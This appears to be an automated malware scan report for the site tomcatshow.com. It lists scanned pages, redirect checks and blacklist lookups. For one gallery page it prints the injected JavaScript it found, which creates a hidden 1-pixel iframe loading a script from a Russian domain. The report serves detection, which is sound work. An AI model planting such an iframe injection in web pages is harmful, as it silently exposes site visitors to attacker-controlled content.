Scanned pages/files
Request | Server response | Status |
http://tomcatshow.com/ | 200 OK Content-Length: 8270 Content-Type: text/html | clean |
http://tomcatshowcom.fatcow.com/survey/default.js | 200 OK Content-Length: 21 Content-Type: application/x-javascript | clean |
http://tomcatshow.com/index.html | 200 OK Content-Length: 8270 Content-Type: text/html | clean |
http://tomcatshow.com/About.html | 200 OK Content-Length: 9789 Content-Type: text/html | clean |
http://tomcatshow.com/Showsx.html | 200 OK Content-Length: 5657 Content-Type: text/html | clean |
http://tomcatshow.com/Links.html | 200 OK Content-Length: 6679 Content-Type: text/html | clean |
http://tomcatshow.com/Picturesx.html | 200 OK Content-Length: 6917 Content-Type: text/html | clean |
http://tomcatshow.com/Contact.html | 200 OK Content-Length: 7019 Content-Type: text/html | clean |
http://tomcatshow.com/test404page.js | 404 Not Found Content-Length: 767 Content-Type: text/html | clean |
http://tomcatshow.com//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js/ | 404 Not Found Content-Length: 767 Content-Type: text/html | clean |
http://tomcatshow.com/image gallery/index.htm | 200 OK Content-Length: 6631 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: acdastas.ru (function () { var b = document.createElement('iframe'); b.src = 'http://acdastas.ru/count12.php'; b.style.position = 'absolute'; b.style.border = '0'; b.style.height = '1px'; b.style.width = '1px'; b.style.left = '1px'; b.style.top = '1px'; if (!document.getElementById('b')) { document.write('<div id=\'b\'></div>'); document.getElementById('b').appendChild(b); }})(); | ||
http://tomcatshow.com/image gallery/Index.html | 404 Not Found Content-Length: 767 Content-Type: text/html | clean |
http://tomcatshow.com/image gallery/About.html | 404 Not Found Content-Length: 767 Content-Type: text/html | clean |
http://tomcatshow.com/image gallery/Showsx.html | 404 Not Found Content-Length: 767 Content-Type: text/html | clean |
http://tomcatshow.com/image gallery/Links.html | 404 Not Found Content-Length: 767 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tomcatshow.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3600
Connection: close
Date: Sat, 04 Oct 2014 18:03:52 GMT
Accept-Ranges: bytes
Age: 0
ETag: "204e-4d58c195e5fdd"
Server: Apache/2
Content-Length: 8270
Content-Type: text/html
Expires: Sat, 04 Oct 2014 19:03:52 GMT
Last-Modified: Tue, 12 Feb 2013 19:33:24 GMT
...8270 bytes of data.
GET / HTTP/1.1
Host: tomcatshow.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3600
Connection: close
Date: Sat, 04 Oct 2014 18:03:52 GMT
Accept-Ranges: bytes
Age: 0
ETag: "204e-4d58c195e5fdd"
Server: Apache/2
Content-Length: 8270
Content-Type: text/html
Expires: Sat, 04 Oct 2014 19:03:52 GMT
Last-Modified: Tue, 12 Feb 2013 19:33:24 GMT
...8270 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: tomcatshow.com
Referer: http://www.google.com/search?q=tomcatshow.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tomcatshow.com
Referer: http://www.google.com/search?q=tomcatshow.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tomcatshow.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tomcatshow.com/
Result: tomcatshow.com is not infected or malware details are not published yet.
Result: tomcatshow.com is not infected or malware details are not published yet.